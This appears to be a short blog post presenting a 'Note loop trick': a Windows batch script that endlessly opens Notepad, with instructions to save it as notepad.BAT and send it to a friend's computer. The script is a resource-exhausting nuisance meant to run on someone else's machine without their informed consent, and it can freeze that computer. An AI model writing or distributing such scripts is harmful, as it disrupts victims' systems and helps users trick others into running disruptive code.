Note loop trick

To Open Notepad
continuously in your
friend ’s computer:
Type the code in notepad
as :
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Save it as “notepad.BAT”
and send it.

Comments

Popular Posts